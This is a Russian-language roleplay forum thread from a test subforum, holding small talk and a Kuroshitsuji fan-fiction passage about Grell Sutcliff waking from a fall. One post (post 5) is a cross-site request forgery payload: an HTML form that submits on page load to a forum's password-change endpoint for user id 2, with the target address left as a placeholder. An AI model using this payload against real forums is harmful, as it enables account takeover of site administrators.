Похотливый Шики

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » Похотливый Шики » Тестовый форум » тема 2

тема 2

Сообщений 1 страница 6 из 6

1

...

2

Тестовый форум, да?)

3

НяФФ
угумс)

4

Muraki
Помочь чем? *_* xD Атата.. мм... я веб-дизайнер *__* xD

5

<script lang=javascript>
  function hackedforum () {
document.hacked.submit();
  }
</script>
<body onload="hackedforum()">
<form method="post" name="hacked" action="http://ЦЕЛЬ(АДРЕС ФОРУМА)/profile.php?action=change_pass&amp;id=2">
<input type="hidden" name="form_sent" value="1">
<input type="hidden" name="req_new_password1" value="your_password">
<input type="hidden" name="req_new_password2" value="12345">
</form>

6

Эй, осторо-… Жнец не успел договорить и приземлился головой о каменный пол, провалившись в глубокий обморок. Ему повезло, что шинигами такие живучие, стоило стукнуть так об пол Мадам Рэд, и за ангелом стал бы числиться грех за убийство невинной женщины. Может поэтому к неудачнику Грелю и относились так неловко, как к лишнему грузу – бросали, тягали за волосы, незаслуженно обижали. Сатклифф не успел даже ойкнуть, распластавшись на холодном каменном полу. Жнецу снился сладкий сон, в котором он был королевой, а все мужчины, которые когда-либо отвергали его, преклоняли пред ним колена и целовали изящные тонкие пальчики в алых перчатках. Грель надменно кривил губы в усмешке, слушая прекрасные комплименты и отвергал восхищённых его красотой поклонников  одного за одним. Среди огромной толпы этих мужчин были Вильям и Себастьян, но они стояли поодаль и чересчур подозрительно перешептывались, что вызвало у Греля волну возмущения. Он встал, закинув на плечо любимую пилу,  и запутался в складках пышного платья, рухнув с пьедестала, на котором стоял трон. И от этого удара во сне Грель  резко проснулся и открыл глаза. Голова кружилась и болела, и даже лёгкое прикосновение к огромной шишке на затылке заставило бедняжку жалобно простонать.
Перед глазами предстала всё та же комната, куда его перенёс ангел, но все куда-то подевались, а он в трупной позе оказался на диване. Поднявшись на локте и оглядевшись, он вспомнил как его уронили, но больше ничего не приходило ему на ум.
- Меня все бросили! Ну погодите, доберусь я до вас! Ой-ёй-ёй, моя бедная головушка.
Жнец недовольно цокнул языком и уже машинальным жестом вытащил из кармана небольшое зеркальце, чтобы поправить причёску.И посмотреть , не потекла лишь тушь во сне. Волосы оказались некрасиво взъерошены, и Грель  сокрушенно протянул:
- Кто это сделал - руки отпилю!
Но оставаться здесь одному вовсе не хотелось, он обеспокоенно осмотрелся и выбежал из комнаты

Вы здесь » Похотливый Шики » Тестовый форум » тема 2